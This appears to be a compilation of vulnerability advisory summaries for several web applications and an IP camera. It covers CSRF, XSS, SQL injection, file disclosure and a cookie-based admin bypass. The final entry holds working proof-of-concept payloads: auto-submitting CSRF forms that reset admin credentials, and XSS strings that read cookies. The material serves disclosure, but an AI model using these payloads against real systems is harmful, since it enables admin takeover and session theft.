The first vulnerability is a Cross Site Request Forgery (CSRF) vulnerability which allows an attacker to add an admin user to the system. The second vulnerability is a Cross Site Scripting (XSS) vulnerability which allows an attacker to inject malicious JavaScript code into the system. The third vulnerability is a Local File disclure vulnerability which allows an attacker to download sensitive files from the system.
Vacation Packages Listing V2.0 is vulnerable to Cross Site Request Forgery and Multiple Cross Site Scripting. An attacker can exploit this vulnerability by sending a malicious request to the vulnerable application. The malicious request can be used to add an admin user or inject malicious scripts into the application. Severity of this vulnerability is high with CVSS score 8.2.
A Cross Site Request Forgery (CSRF) vulnerability exists in Property Listing Script V2.0, which allows an attacker to add an admin user to the application. An attacker can craft a malicious HTML page that contains a form with hidden fields and submit it to the vulnerable application. This will add an admin user to the application with the credentials specified in the form fields.
The Pet Listing Script V1.0 is vulnerable to Cross Site Request Forgery and Multiple Cross Site Scripting. An attacker can exploit this vulnerability by sending a malicious request to the server with a crafted HTML form containing hidden input fields. The attacker can also exploit the vulnerability by sending a malicious request with a crafted HTML form containing a script tag with malicious JavaScript code. This can be used to steal the user's cookies and gain access to the application.
Double query type of SQL Injection vulnerability has been detected in Collabtive web applivation. Application failed to sanitize user supplied input in parameter 'id' of page managetimetracker.php. User must be authenticated to exploit this vulnerability.
The vulnerability exists due to insufficient filtration of 'start' HTTP GET parameter passed to '/lib/functions/d-load.php' script before using it in PHP 'fopen()' function. A remote attacker can read contents of arbitrary files on the target system with privileges of the web server. The vulnerability exists due to insufficient validation of 'category' HTTP POST parameter passed to '/download.php' script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
The vulnerability exists due to insufficient authentication when handling "burden_user_rememberme" cookie parameter. A remote unauthenticated user can set "burden_user_rememberme" cookie to "1" and gain administrative access to the application.
The CSRF is present in the CGI formulary used to create and modify users of the web interface of the camera (/set_users.cgi). This CSRF would allow a malicious attacker to create users in the camera web interface (including administrator users) if he is able to lure the legitimate administrator of the camera to visit a web controlled by the attacker.
The Event Booking Calendar V2.0 is vulnerable to multiple Blind Injection, Cross Site Request Forgery and Multiple Cross Site Scripting. An attacker can exploit these vulnerabilities by sending malicious requests to the vulnerable website. For example, an attacker can send a malicious request to the vulnerable website with a crafted URL containing an injection payload. The attacker can also exploit the Cross Site Request Forgery vulnerability by sending a malicious request with a crafted HTML form containing the username and password of the admin. Finally, the attacker can exploit the Multiple Cross Site Scripting vulnerability by sending a malicious request with a crafted HTML form containing a malicious JavaScript code.
I. Persistent XSS: CSRF with XSS Exploit: <html><body onload="document.form0.submit();"><form method="POST" name="form0" action="http://SITE/index.php?controller=AdminExtras&action=create"><input type="hidden" name="extra_create" value="1"/><input type="hidden" name="i18n[1][name]" value="<script>alert(document.cookie);</script>"/><input type="hidden" name="i18n[2][name]" value=""/><input type="hidden" name="i18n[3][name]" value=""/><input type="hidden" name="price" value="1000$"/><input type="hidden" name="per" value="booking"/><input type="hidden" name="count" value="1000$"/></form></body></html> II. Non-Persistent XSS: www.site.com/index.php?controller=AdminBookings&action=index&p_date=XSS www.site.com/index.php?controller=AdminBookings&action=index&p_date="><script>alert(document.cookie);</script>"/> [2] Cross Site Request Forgery: [Change Username/Password Admin]: <html><body onload="document.form0.submit();"><form method="POST" name="form0" action="http://site/index.php?controller=AdminOptions&action=update"><input type="hidden" name="options_update" value="1"/><input type="hidden" name="tab" value="1"/><input type="hidden" name="username" value="admin"/><input type="hidden" name="password" value="password"/><input type="hidden" name="value-enum-currency" value="USD|GBP|EUR::USD"/><input type="hidden" name="value-enum-date_format" value="d.m.Y|m.d.Y|Y.m.d|j.n.Y|n.j.Y|Y.n.j|d/m/Y|m/d/Y|Y/m/d|j/n/Y|n/j/Y|Y/n/j::d.m.Y"/><input type="hidden" name="value-enum-time_format" value="H:i|h:i A|g:i A::H:i"/><input type="hidden" name="value-enum-timezone" value="-12:00|-11:00|-10:00|-09:30|-09:00|-08:00|-07:00|-06:00|-05:00|-04:30|-04:00|-03:30|-03:00|-02:00|-01:00|+00:00|+01:00|+02:00|+03:00|+03:30|+04:00|+04:30|+05:00|+05:30|+05:45|+06:00|+06:30|+07:00|+08:00|+08:45|+09:00|+09:30|+10:00|+10:30|+11:00|+12:00|+12:45|+13:00|+14:00::+02:00"/></form></body></html>
Services By CQR